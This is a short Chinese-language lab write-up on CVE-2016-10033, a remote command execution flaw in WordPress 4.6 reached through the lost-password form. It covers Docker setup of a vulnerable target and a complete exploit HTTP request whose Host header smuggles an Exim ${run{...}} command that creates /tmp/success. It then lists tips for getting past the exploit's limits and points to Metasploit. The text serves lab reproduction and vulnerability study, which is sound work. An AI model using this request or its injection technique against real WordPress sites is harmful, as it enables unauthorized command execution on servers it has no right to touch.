CVE-2016-10033_Wordpress 4.6 任意命令执行漏洞(Pwnscriptum)
漏洞原理
参考 https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
测试环境
靶场:192.168.4.10_ubuntu
编译及运行测试环境
#docker-compose build
#docker-compose up -d
由于Mysql初始化需要一段时间,所以请等待。成功运行后,访问`http://your-ip:8080/`打开站点,初始化管理员用户名和密码后即可使用(数据库等已经配置好,且不会自动更新)。
测试与EXP使用
发送如下数据包
```
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login=root
```
可见`/tmp/success`已经成功创建:
但实际利用起来,还是有一些坑需要踏过。具体的坑有这么几个:
1. 执行的命令不能包含大量特殊字符,如`:`、引号等。
2. 命令会被转换成小写字母
3. 命令需要使用绝对路径
4. 需要知道某一个存在的用户的用户名
漏洞利用
使用msf复现
